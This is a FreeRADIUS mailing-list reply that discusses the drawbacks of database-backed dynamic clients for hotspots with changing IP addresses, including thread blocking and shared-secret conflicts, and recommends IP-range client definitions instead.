Dynamic Clients IP Best practice?

Arran Cudbard-Bell a.cudbardb at freeradius.org
Fri Jun 24 12:41:13 CEST 2011


> 
> The advantage compared to the "ip range client" solution is that you get
> to keep unique shortnames and secrets per hotspot.  But I don't want to
> estimate any security gain, since you must allow the clients to update
> their own client entry.  If one of hotspots is insecure, then the whole
> network will be insecure.

Ok there are a couple of issues with using a database for dynamic clients.

1. The main server thread handles adding dynamic clients and blocks whilst the client is being read out of the database. This means no new requests are passed to the worker threads until the SQL module returns and the client is added. The normal way to mitigate against this is to preload all existing clients out of the SQL DB, but you can't do that in this case because that would create static entries, and potentially cause a conflict when an access point changes IP address (shared secrets would then be incorrect if you were using unique ones).

So if lots of APs were active and being added for the first time since the server started you may notice increased latency responding to requests. It also kinda hoses the server if the database becomes inaccessible.

2. Because you're using dynamic IP addresses there's the potential for conflict. If two access points swapped IP allocations and you were using unique shared secrets the AP info would not be updated, the requests would just be rejected with a bad shared secret errors. There is a cache timer to expire entries, but if you set it too short you'll run into real issues with 1).

So if you were to use dynamic clients you'd most likely want to use common shared secrets - Honestly with todays computational power they're pretty easy to break anyway (one of the many reasons for RADSEC). 

The only advantage then is Client-Short-Name, which you could easily populate using SQL XLAT from a database of Mac-Addresses (Calling-Station-ID) to Short-names (or a flat file, just change the key to be Calling-Station-ID).

In this instance, if the NAS' aren't in too many different subnets and the subnets aren't likely to change, then IP ranges are still probably the best solution. Dynamic Clients are not really suited to highly dynamic environments.

-Arran


Arran Cudbard-Bell
a.cudbardb at freeradius.org

RADIUS - Half the complexity of Diameter





More information about the Freeradius-Users mailing list